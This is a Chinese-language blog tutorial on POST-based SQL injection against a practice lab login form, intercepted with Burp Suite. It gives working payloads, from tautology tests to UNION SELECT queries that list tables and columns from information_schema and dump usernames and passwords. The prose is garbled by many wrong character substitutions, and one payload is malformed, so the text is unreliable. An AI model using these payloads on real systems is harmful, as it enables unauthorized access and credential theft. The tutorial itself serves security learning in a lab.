关于安全:从零开始学渗透SQL注入四

2次阅读

共计 905 个字符,预计需要花费 3 分钟才能阅读完成。

本文仅提供思路学习参考

POST 注入

在咱们一般的上网生存中,登录页是咱们常常打交道的一个网页,而其原理个别都是通过 POST 办法将咱们的账号密码整体作为一个表单发送给后端数据库经校验后,用户登录。它其实只是数据提交型式的不同,应用的办法都是基于后面的 Union,报错,工夫等等注入形式。是一个不错的温习机会。个别配合着抓包工具应用,这里举荐burpsuite

靶场实战

任意输出 username password 点击 submit 提交表单信息。
(接下来都是在抓包工具中对参数进行批改)

在 username 处须要结构恒真语句
uname=a or 1=1--+&passwd=1&submit=Submit 返回页面出错,阐明不是数字型
uname=a'or 1=1--+&passwd=1&submit=Submit 返回页面,登录胜利
uname=a' or 1=2--+&passwd=1&submit=Submit 返回页面出错,登录失败

存在回显的话,那就能够用 union 查问来获取咱们须要的信息了。

1. 先查看数据库版本和数据库名
uname=a' union select database(),version()--+

2. 查看表名

uname=a' union select1,group_concat(table_name) from information_schema.tables where table_schema =database()--+

3. 获取列名

uname=a'union select 1,group_concat(column_name) from information_schema.columns where table_name ='users'--+

4. 获取具体信息

uname=a' union select 1,group_concat(username,password) from users--+

至此,咱们想要获取的信息都获取到了,POST 注入次要是配合抓包工具来进行更改参数,实质还是用着前几种办法!持续加油

参考链接
https://blog.csdn.net/qq_4126…
https://portswigger.net/burp

正文完
 0